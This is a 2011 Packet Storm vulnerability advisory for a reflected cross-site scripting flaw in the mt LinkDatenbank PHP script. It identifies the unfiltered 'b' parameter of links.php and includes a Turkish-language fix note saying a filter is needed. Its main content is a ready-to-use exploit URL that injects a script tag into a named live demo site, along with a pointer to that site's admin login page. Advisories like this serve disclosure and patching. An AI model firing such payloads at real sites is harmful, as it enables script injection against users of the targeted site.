mt LinkDatenbank Cross Site Scripting

2011-08-02T00:00:00
ID PACKETSTORM:103674
Type packetstorm
Reporter Izam
Modified 2011-08-02T00:00:00

Description

                                        
                                            `[#] Exploit Title: mt LinkDatenbank Cross Site Script Vulnerability  
  
[#] Author: Err0r  
  
[#] Date: 30.07.2011  
  
[#] E-mail: err0riletisim@gmail.com  
  
[#] Category: Web App.  
  
[#] Note : Warning.  
  
[#] DEMO:http://www.michatronic.de/scripts/demos/mt_linkdb  
  
[#] Price : Free System  
  
[#] Vuln Type: Reflected Cross Site Scripting  
  
[!] Fix : " B " deðiþkenine GET \ ile aktarýlanlar Ekrana yazdýrýlýyor.  
Araya Filtre konulmalýdýr .  
  
##################  
  
[*] Exploit :  
  
#  
http://www.michatronic.de/scripts/demos/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E  
  
# http://www.michatronic.de/scripts/demos/mt_linkdb/admin.php ~~~~>>>  
Password Enter...  
  
###############  
`